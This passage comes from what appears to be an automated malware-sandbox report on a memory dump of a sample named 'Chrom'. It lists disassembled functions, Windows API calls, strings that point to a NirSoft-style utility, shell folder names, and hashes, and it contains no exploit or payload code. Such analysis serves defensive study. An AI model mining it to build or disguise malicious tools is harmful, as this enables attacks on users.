                                                                                                                                                        • Instruction Fuzzy Hash: 31F0FC21FC132175E2253A635C07F2E35148BD3B57F5648BBBC147E1D3C66C5A48829E
                                                                                                                                                        Function 00410D08 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00410D27
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00410D3D
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00410D53
                                                                                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00410D8D
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00410D94
                                                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00410DA4
                                                                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00410DC8
                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 00410DEB
                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 00410E0A
                                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 00410E35
                                                                                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00410E4D
                                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 00410E52
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 552707033-0
                                                                                                                                                        • Opcode ID: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
                                                                                                                                                        • Instruction ID: f4b3975cf6f7d3be18b30986ddc530eb89c4367e0f7efeac37d180ea3f2c0f2c
                                                                                                                                                        • Opcode Fuzzy Hash: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
                                                                                                                                                        • Instruction Fuzzy Hash: AC41C275900209BFEB11DFA8DD89FEEBBBAFB48300F104565E615A21A0C772AA54DB14
                                                                                                                                                        Function 0040C532 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C703,?,?,*.*,0040C76D,00000000), ref: 0040C552
                                                                                                                                                          • Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C582
                                                                                                                                                          • Part of subcall function 0040C4A1: _memicmp.MSVCRT ref: 0040C4BB
                                                                                                                                                          • Part of subcall function 0040C4A1: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C76D,00000000), ref: 0040C4D2
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C5C9
                                                                                                                                                        • strchr.MSVCRT ref: 0040C5EE
                                                                                                                                                        • strchr.MSVCRT ref: 0040C5FF
                                                                                                                                                        • _strlwr.MSVCRT ref: 0040C60D
                                                                                                                                                        • memset.MSVCRT ref: 0040C628
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C675
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                        • String ID: 4$h
                                                                                                                                                        • API String ID: 4066021378-1856150674
                                                                                                                                                        • Opcode ID: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
                                                                                                                                                        • Instruction ID: 65cccf327fa0b5529330076339007647872360192ef6f3cf49ce6089d60f06ae
                                                                                                                                                        • Opcode Fuzzy Hash: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
                                                                                                                                                        • Instruction Fuzzy Hash: 3B3182B1900218FEEB20EB64CC85EEE77ACEF05318F10457AF608E6181D7399F548B69
                                                                                                                                                        Function 004164F5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                        • String ID: %%0.%df
                                                                                                                                                        • API String ID: 3473751417-763548558
                                                                                                                                                        • Opcode ID: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
                                                                                                                                                        • Instruction ID: 27f99667104659e00ebd78455ae99a1af8c3fb89703bd44fec75f468f68576de
                                                                                                                                                        • Opcode Fuzzy Hash: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
                                                                                                                                                        • Instruction Fuzzy Hash: 2231A471840229BADB20EF55CC85FEB777CFF49314F0104EAB50DA2102E7349A54CB69
                                                                                                                                                        Function 004078E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 00407903
                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00407913
                                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 00407924
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00407947
                                                                                                                                                        • GetParent.USER32(?), ref: 00407972
                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 00407979
                                                                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00407987
                                                                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 004079D7
                                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004079E3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                        • String ID: A
                                                                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                                                                        • Opcode ID: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
                                                                                                                                                        • Instruction ID: af3d0bace5b62026118a6a1531e93ae50cbe973fa598ddd1ec3a4275e27b1afc
                                                                                                                                                        • Opcode Fuzzy Hash: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
                                                                                                                                                        • Instruction Fuzzy Hash: F431C2B9640305BBEB201F61CC86FAB7B6ABB44711F00443AF709B91E0C7F9A855CB59
                                                                                                                                                        Function 0040DE05 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadMenuW.USER32(?,?), ref: 0040DE2D
                                                                                                                                                          • Part of subcall function 0040DC55: GetMenuItemCount.USER32(?), ref: 0040DC6B
                                                                                                                                                          • Part of subcall function 0040DC55: memset.MSVCRT ref: 0040DC8A
                                                                                                                                                          • Part of subcall function 0040DC55: GetMenuItemInfoW.USER32 ref: 0040DCC6
                                                                                                                                                          • Part of subcall function 0040DC55: wcschr.MSVCRT ref: 0040DCDE
                                                                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040DE4B
                                                                                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040DE00,00000000), ref: 0040DEA0
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0040DEAB
                                                                                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DEB8
                                                                                                                                                        • memset.MSVCRT ref: 0040DED1
                                                                                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DEE8
                                                                                                                                                        • EnumChildWindows.USER32(00000005,Function_0000DD46,00000000), ref: 0040DF15
                                                                                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DF1E
                                                                                                                                                          • Part of subcall function 0040DA84: _snwprintf.MSVCRT ref: 0040DAA9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                        • String ID: caption
                                                                                                                                                        • API String ID: 973020956-4135340389
                                                                                                                                                        • Opcode ID: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
                                                                                                                                                        • Instruction ID: fb89002f7bebac49d56e068043a0f8d6468f1f005a4246ac5316588196cd2f0c
                                                                                                                                                        • Opcode Fuzzy Hash: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
                                                                                                                                                        • Instruction Fuzzy Hash: 3E317072900208BFEF11AF90DC85AAF3B69FB15364F10843AF905A91A1D7798998CF59
                                                                                                                                                        Function 004105A7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004105B7
                                                                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410624
                                                                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410647
                                                                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410683
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                                                                        • Opcode ID: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
                                                                                                                                                        • Instruction ID: 23ba5de25e919ab4fdab3582845b47b673a12a4a92696f01ca941476ed93b1dd
                                                                                                                                                        • Opcode Fuzzy Hash: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
                                                                                                                                                        • Instruction Fuzzy Hash: 1D21B8B5A001186BDB21BB95CC41EDA37BCEF58745F0140BEF508D3151DA389AC88F69
                                                                                                                                                        Function 004153A6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcschr.MSVCRT ref: 004153BF
                                                                                                                                                        • wcscpy.MSVCRT ref: 004153CF
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
                                                                                                                                                          • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
                                                                                                                                                          • Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA
                                                                                                                                                        • wcscpy.MSVCRT ref: 0041541E
                                                                                                                                                        • wcscat.MSVCRT ref: 00415429
                                                                                                                                                        • memset.MSVCRT ref: 00415405
                                                                                                                                                          • Part of subcall function 0040A394: GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
                                                                                                                                                          • Part of subcall function 0040A394: wcscpy.MSVCRT ref: 0040A3BA
                                                                                                                                                        • memset.MSVCRT ref: 0041544D
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00415468
                                                                                                                                                        • wcscat.MSVCRT ref: 00415474
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                        • String ID: \systemroot
                                                                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                                                                        • Opcode ID: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
                                                                                                                                                        • Instruction ID: f104943179f08cd93f8001f39408b1af5f6ad57b201dd995218135a96354df9e
                                                                                                                                                        • Opcode Fuzzy Hash: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
                                                                                                                                                        • Instruction Fuzzy Hash: 572129B2506304A9F621F3A24C46EEB63EC9F46714F20455FF524D2082EB7C99C44B6F
                                                                                                                                                        Function 0041A5D7 Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
                                                                                                                                                        • malloc.MSVCRT ref: 0041A60E
                                                                                                                                                        • free.MSVCRT ref: 0041A61E
                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A632
                                                                                                                                                        • free.MSVCRT ref: 0041A637
                                                                                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A64D
                                                                                                                                                        • malloc.MSVCRT ref: 0041A655
                                                                                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A668
                                                                                                                                                        • free.MSVCRT ref: 0041A66D
                                                                                                                                                        • free.MSVCRT ref: 0041A681
                                                                                                                                                        • free.MSVCRT ref: 0041A6A0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3356672799-0
                                                                                                                                                        • Opcode ID: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
                                                                                                                                                        • Instruction ID: f6f3b6a306e4f0e49f71bf4976b7ceda75d2138abfea52430b05dfcd18a6bddb
                                                                                                                                                        • Opcode Fuzzy Hash: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
                                                                                                                                                        • Instruction Fuzzy Hash: 2121987190211CBFEF10BBA5DC46CDF7FA9DF41368B25007BF404A2161DB395E90966A
                                                                                                                                                        Function 00416B16 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy
                                                                                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                        • API String ID: 1284135714-318151290
                                                                                                                                                        • Opcode ID: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
                                                                                                                                                        • Instruction ID: d324c76f68bf74469ccfd3712f78ba9dcc04a4285760018fac4a8f65c25a8c98
                                                                                                                                                        • Opcode Fuzzy Hash: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
                                                                                                                                                        • Instruction Fuzzy Hash: 95F036316ECF3562143415282916EFA401891317F73BB43176C0EE22E6C9CCF9CA905F
                                                                                                                                                        Function 0040D759 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                        • String ID: 0$6
                                                                                                                                                        • API String ID: 4066108131-3849865405
                                                                                                                                                        • Opcode ID: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
                                                                                                                                                        • Instruction ID: f65e57152afae8b0dd47d5e8eb23764001e0fb6d1e5383f22b1dcfc0afcde8a7
                                                                                                                                                        • Opcode Fuzzy Hash: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
                                                                                                                                                        • Instruction Fuzzy Hash: BE319072808300AFDB20AF91D84499FB7E8EF84354F04893FFA98A2191D375D948CF5A
                                                                                                                                                        Function 0040948F Relevance: 15.3, APIs: 12, Instructions: 268COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004094B7
                                                                                                                                                          • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
                                                                                                                                                        • memset.MSVCRT ref: 0040952E
                                                                                                                                                        • memset.MSVCRT ref: 00409544
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 290601579-0
                                                                                                                                                        • Opcode ID: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
                                                                                                                                                        • Instruction ID: d523f13bca41d4f63d03b58f3e107dc7881316ec19a855ef67c9f0f82ee91530
                                                                                                                                                        • Opcode Fuzzy Hash: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
                                                                                                                                                        • Instruction Fuzzy Hash: FF9183B2D042199FDF14EFA59C82AEDB7B5AF44314F1404AFF608B6282DB395D44CB19
                                                                                                                                                        Function 0040A501 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 0040A51A
                                                                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 0040A520
                                                                                                                                                        • GetDC.USER32(00000000), ref: 0040A52D
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040A53E
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040A545
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0040A54C
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040A55F
                                                                                                                                                        • GetParent.USER32(?), ref: 0040A564
                                                                                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 0040A581
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A5E0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
